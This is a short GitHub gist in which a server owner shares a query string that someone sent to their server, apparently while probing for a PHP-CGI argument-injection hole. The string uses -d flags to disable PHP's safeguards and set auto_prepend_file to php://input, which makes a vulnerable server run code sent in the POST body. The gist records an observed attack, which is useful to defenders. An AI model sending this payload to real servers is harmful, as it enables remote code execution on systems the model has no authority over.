Skip to content

Instantly share code, notes, and snippets.

@bobpoekert
Created November 7, 2013 16:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bobpoekert/7357711 to your computer and use it in GitHub Desktop.
Save bobpoekert/7357711 to your computer and use it in GitHub Desktop.
people have php configured to execute code from post requests? I just noticed somebody drive-by posting this to my server.
cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment